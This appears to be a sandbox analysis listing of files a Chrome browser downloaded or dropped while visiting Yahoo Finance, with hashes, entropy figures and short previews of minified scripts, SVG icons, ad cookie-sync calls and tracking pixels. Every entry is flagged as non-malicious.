                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Oe,A as J,e as Z,b as P,p as U,d as $,f as x,i as I,j,B as ie,L as R,k as D,x as Ee,a5 as Ke,r as Ge,D as Qe,W as ge,c as He,u as we,g as ze,a as Pe,q as S,O as ne,Q as Re,l as F,G as de,v as Ue,t as re,h as fe,m as ue,n as ve,K as ke}from"./scheduler.Dsuh-FKt.js";import{S as We,i as Ye,t as h,g as E,e as H,a as k,c as q,b as L,m as V,d as y}from"./index.CvwOawEI.js";import{e as se}from"./each.CI2tb2RB.js";import{g as me,a as Fe}from"./spread.CgU5AtxT.js";import{T as Je}from"./commonUtil.BWwawKjd.js";import{c as Ze,g as oe}from"./i13nUtil.8E8_gCdn.js";import{I as ce}from"./Icon.C8w5V9EK.js";import{S as $e,O as xe}from"./Select.DMUNtRO-.js";import{T as el}from"./Tooltip.CzSuDxyY.js";import{l as je}from"./yf-lock.ClgspVU1.js";import{l as ll}from"./yf-unlock.DelAiXlN.js";import{w as tl}from"./43.BgWy8GOF.js";const al='<svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" viewBox="0 0 48 48"><path d="M24 0C10.7 0 0 10.7 0 24s10.7 24 24 24 24-10.7 24-24S37.3 0 24 0m-6.4 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7046)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7047
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3327749033481275
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:w3seKVb/U5axd9tUv+SFK2el614caydirI:wceKVbPTSF3el614caWirI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1A1A408E5624C1D38CA85AC1641A9ADD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:91C8E2B99178CFCE2B254010136F39F003DF887D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:53279E78EE0E9D8937E8B92C60A116FB1D8D7477797DA25B185D287ECE7EDF82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5297E1738ACAF5B8BC58204C589136B24AF97559E36DDB55D503CD6EF03FF8714238CCFF530474B8B5627D6D622F8C39542275370B75CF681278363A6A9934B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/nodes/2.CK7MWYuc.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{C as K,g as L,m as q,s as V,t as j}from"../chunks/commonUtil.BWwawKjd.js";import{s as z,b as k,p as P,j as w,k as b,i as g,o as G,t as D,h as F,n as J,e as Q,d as U,f as X,q as Y,L as h,K as C,c as Z,u as x,g as ee,a as te,H as se,z as ie}from"../chunks/scheduler.Dsuh-FKt.js";import{S as R,i as B,t as p,g as v,a as c,e as H,c as y,b as A,m as S,d as N}from"../chunks/index.CvwOawEI.js";import{p as fe}from"../chunks/stores.BCwnb1-k.js";import{A as ne,P as re,G as ae,b as le,M as oe,C as me,a as ue}from"../chunks/PageProgressBar.D-6_6JJN.js";import pe from"../chunks/Ads.t43t7gLT.js";import{H as ce}from"../chunks/Header.Cq72aaJC.js";import{L as $e}from"../chunks/Link.vSNQugO0.js";const _e=!1,ge="always",be=async({data:l,url:s})=>{const{crumb:i="",headerResponse:t,pages:n,portfolios:f,session:m,serviceConfig:e,subscription:a,translations:o}=l,u=K({session:m,crumb:i,pages:n,portfolios:f,subscription:a,translations:o});return{crumb:i,headerResponse:t,pages:n,portfolios:f,session:typeof
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1654), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1654
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.556175402880624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:jTg0n77+kFjkiUusyuqjuasedCKAHVGEq:N7pIfEjuafdCbIEq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C1E6CBEA76E135E9002F62520FEF85D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:82339A9C4E3662688D94F91CB36613E58F3F4D25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A6E2F96B8C4E4C9FFB8644F28A132F8B3133070CD73971D71C902C2BDDAB5947
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F02F6D7BA0DBD011590D1F4DB5AF062BC34C7B02CF0061228F860B1F01FC8F7A831D8637C5468ED0302FD2AB4807AB3DDABCAEB0A9BC76094EEBB441401A9B56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=80517890&p=0&s=0&a=0&ptask=ALL&np=0&fp=0&rp=1&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncIframePixel('https://dis.criteo.com/dis/usersync.aspx?r=3&p=4&cp=pubmaticUS&cu=1&&gdpr=0&gdpr_consent=&url=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5MjgmdGw9NDMyMDA=&piggybackCookie=uid:@@CRITEO_USERID@@');PubMatic.loadAsyncIframePixel('https://cms.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?idmatch=0&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://x.bidswitch.net/sync?ssp=pubmatic&gdpr=0&gdpr_consent=&us_privacy=#US_PRIVACY');PubMatic.loadAsyncIframePixel('https://t.adx.opera.com/pub/sync?pubid=pub8730968190912');PubMatic.loadAsyncIframePixel('https://dsp-cookie.adfarm1.adition.com/?ssp=9&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync.srv.stackadapt.com/sync?nid=11&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync-tm.everesttech.net/upi/pid/b9pj45k4?redir=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=${TM_USER_ID}&gdpr=1&gdp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):150
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.039572593136675
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHpWyepGpTuSypKcwH8KFAdSbF3:H69mc4sl3O4pTi3JO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B24E5028CE6AA93D50F366887C1BB3AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:221E24AA9FAA4A7511CBC6EA701DED627E40F88E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BEAD6056FFC1C60BFA669E524A4B45998A3443192279B1C664FF1C3DF7FB9E8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:00438EF05FAC3D5349A3CB9017C2877380CA95BBA780BFE23D977FCDFB651BDA8F20048B45357B1978C67915304CCE2A556DE614973FD7E717AC3AE236A39938
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M15.41 7.41 14 6l-6 6 6 6 1.41-1.41L10.83 12z"/></svg>';export{s as L};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):247
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.417739541804018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:H69mc4sl3O4ZDLzc6XxlIXtFoFY3FYXtHwHXW7IVoXtHwHXW7yz:a1PZLzc6BSnoYKdUSIVodUSa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0C7E4F0571F3A9FFF611B64B54CB8BB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5285D474E876354196B6C434C15C9E732A44DFEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DCE077EA95B600945113399EEAA2A98E95156F43C36C1C12019045FFDED51ED5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8870008B63F5BDF6A519F16AEFF721252F77E39214E89C93D7FFAD582FD71B86914070DC55D5D62801C238163720D555C1CF1AFF57FB90F0C9DBE8608E469756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/more_vert.FZx4fZpW.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2m0 2c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2m0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2"/></svg>';export{s as K};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cm.g.doubleclick.net/pixel?google_nid=yieldmo_dbm&google_hm=VlJMQW9MTF9fdUwxZXd5SWE1SXE=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5636), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.265735267819504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:RAnbGg2U2OUK1yZ4YHPEppcIzvxpJ3xIzpNxv+S6hmAPm6UO5OUK3YvE0m6i5xDc:eCgl104YHPEppc+vxpJ3xMpNZgdWGEiv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0CCB51BC1DD6980920DA39E008A599E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:929B21AC5A628A05E9F87A8E734954D90F1EE093
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B168BE397AC36DBCA02B07547DAD2A928427E765DF9B49A931F05DB057F3A83C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:665527069009017AB5B2ACAB0EE764052C84672451CCE9189961420E38239C3C63852D60366952BDFF92DECB3610BD8ABE6BDD44A5B8F89CF51CEF04445F2267
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://edge-mcdn.secure.yahoo.com/ybar/cerebro_min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var WORK_SERVER="https://edge-mcdn.secure.yahoo.com/ybar/exp.json",TIMEOUT=2e3,Cerebro=function(){function e(){this.uploadType="individual",this.expCount=0,this.pending={},this.complete=0}return e.runExperiment=function(){(new e)._fetchWork()},e.sendBeacon=function(){this.runExperiment()},e.prototype._extractResourceTiming=function(n){var t="",t="[";return["startTime","redirectStart","redirectEnd","fetchStart","domainLookupStart","domainLookupEnd","connectStart","secureConnectionStart","connectEnd","requestStart","responseStart","responseEnd"].forEach(function(e){t+=n[e]+","}),t=t.slice(0,-1)+"]"},e.prototype._extractHeader=function(n,e){if(0==e.length)return"{}";var t="{";return e.forEach(function(e){t+='"'+e+'":"'+n.getResponseHeader(e)+'",'}),t=t.slice(0,-1)+"}"},e.prototype._fetchWork=function(){var n=this,r=!1;new Promise(function(n,t){var o=setTimeout(function(){r=!0,t(new Error("Work Order Request Timed Out"))},TIMEOUT);fetch(WORK_SERVER).then(function(e){clearTimeout(o),r||n(e)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (552)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86143
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.456561817569209
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:YQWyL+xpRHUkcQ5V6BJb2JIDkGXc2TjPtKZ+jLuWV6CKEJdnodQ:gKAaVH3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0103E9F52EF96B8BF7939EEBD681D92A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3C7DE469CB144E200BF067650FB3A1A3053640A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EB803B33E2BC6F51CB86B2F318B3850BDED63348CC585E8E4BA0AC59AF18C5F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:80AFAEEB3D14D8D067BF69BBCA978A4F6BAB071CC2D737323CF8981A31214131CD12EFC5DE63B78C39656C2AF7303569F152FE7DFE7F0E13F01B10836D88FD47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(){/*.. Perfect Market Widget Platform Library. Copyright (C) 2011 Perfect Market, Inc.. All Rights Reserved.. NO PERMISSION IS GRANTED TO COPY OR USE CODE EXCEPT AS IS . NECESSARY TO DISPLAY ADS IN THE NORMAL COURSE OF BROWSING A WEB SITE.. CONFIDENTIAL COPYRIGHTED AND PATENTED MATERIAL. US PATENTS 7,610,279 7,644,072 7,617,200 and 7,627,565. OTHER PATENTS PENDING.. DO NOT DECOMPILE OR REVERSE ENGINEER.*/.function m(){return function(){}}function q(b){return function(a){this[b]=a}}function s(b){return function(){return this[b]}}var _pmk=_pmk||{};window._pmk=_pmk;TBWidgetFacebook=function(){this.B="stp";this.name="facebook";this.Ma=!1;this.L=[];this.ia=[];this.Oi=this.pi=!1;this.zh=0;TBWidgetFacebook.prototype.k=m();TBWidgetFacebook.prototype.Ca=m();TBWidgetFacebook.prototype.yh=m();TBWidgetFacebook.prototype.P=function(){this.Ma=!0}};window.TBWidgetFacebook=TBWidgetFacebook;.TBVideoElem=function(b,a,c){this.Wd="none";this.rd=this.Qf="video";this.td="player-div";if(null!==b)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.872465168837431
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:Yh0Z9NoV+DgP6HT6ADg44a/NRADN/VFYrN/HgSoZN/W5icpCyrN/NHWFN/vTD:Yy9NocDgP6HT6ADg44wRMN/VirN/HgvT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9A691FB79D5098F5AC257C5DF14A96E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8E616E6AE9BD4AB12A05DCE5555518F63A871727
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A533846B86DC8771DF5FEA78724812D7006AEA3E9C18322A5D98F42078B7C90B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7D518FDAC2CBBB032FA4189D8B195C2FF02A624086486FC1E3CEE79396B32EA45E5DD215B07C7D0914A76B741669CAD3E5313F07E70B2AA6056B0431BAF87E13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.ShoppingContent.atomic.ltr.1d44a92ce88f1df1ccb0dcecff203bbd.min.css","name":"react-wafer-shopping.ShoppingContent.atomic"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.custom.desktop.fdf1fc8fe6bc6d08523f7958b8edf2b5.css","name":"react-wafer-shopping.custom.desktop"}],"js":[{"location":"bottom","value":"/aaq/wf/wf-core-1.65.1-modern.js","name":"wafer-core","version":"1.65.1"},{"location":"bottom","value":"/aaq/wf/wf-toggle-1.15.4-modern.js","name":"wafer-toggle","version":"1.15.4"},{"location":"bottom","value":"/aaq/wf/wf-fetch-1.19.1-modern.js","name":"wafer-fetch","version":"1.19.1"},{"location":"bottom","value":"/aaq/wf/wf-caas-1.36.6-modern.js","name":"wafer-caas","version":"1.36.6"},{"location":"bottom","value":"/aaq/wf/wf-image-1.4.0-modern.js","name":"wafer-image","version":"1.4.0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.883606614609165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHTmHGFVcVwRuVuVqR2VQcsHASAdSbFy:H69mc4sl3O4ThVcVwRaaprsgx7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:827368291B41497FE4F55F2E33E2119B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9CAD22C912012194A12CF8B5B74C1568549FF5DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4A886A2D2445C248984DAF4CD9789ABF3F8EADFDA69C3CA08DA1FFDB24F10027
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7C207ECD4A50A48A1F0A98E94DAE3A68B4A7AB1884A194C631C167036C6BC1ADC7B344B86BE9DB444E9B59D2DC6DA8734CEDAED4A96E9B356A0407B7EC636316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 2C6.47 2 2 6.47 2 12s4.47 10 10 10 10-4.47 10-10S17.53 2 12 2"/></svg>';export{s as c};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13778), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2842901333678345
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:/JwTpCNwszoTDPohnGZA3exQUqxL/wwBVi:elCNw/XoR4A3eePbi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4443A60B3D3645610C9E65B7CC9F15BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DE3A0B8509362B37FB40D74A9883F366D161A8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F271BF73D0EEFE04F56CB6390E07D7D2A4794787283D65221397B258CEF040DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6134E0CE99CC2128F03FF38713B7A88617EA9C1518F01C6D56CD725673C0F58B58572E4744C6254868D98BE8EF9AF352BA0B724290EB35D182AA5F57381048B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-action",[],e):"object"==typeof exports?exports["wafer-action"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-action"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(a){if(r[a])return r[a].exports;var i=r[a]={i:a,l:!1,exports:{}};return t[a].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var r={};return e.m=t,e.c=r,e.d=function(t,r,a){e.o(t,r)||Object.defineProperty(t,r,{configurable:!1,enumerable:!0,get:a})},e.n=function(t){var r=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(r,"a",r),r},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,r){"use strict";function a(t,e,r){return e in t?Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.014857433755225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:D59mc4sl3O4tf4/YXt5AWPgoc6XzRVY6IVud1NxU:DH1Px4Acfoc6jRq6IVS10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:866A9CFAEE6BE111A366745CC5CBCDFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BB7EC62FA408B479D774D5F0C22E97C7FAA52699
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:68E17E259DDD727D82B31995264CA0F3F3A9F3AE6223BB52FD2B248B2C2B3E9B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A3AE6000CABAF6742D6459B8530F5ED7EFFDBB46C7B3D61A384796428A5EDE13B29A5E577DEC2BBF9594B9F9D177B43B59920B425F34067D3F0214AF27A5426B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const v='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 3h-1V1h-2v2H7V1H5v2H4c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2m0 18H4V8h16z"/></svg>';export{v as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=triplelift&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=3811239664715375770435
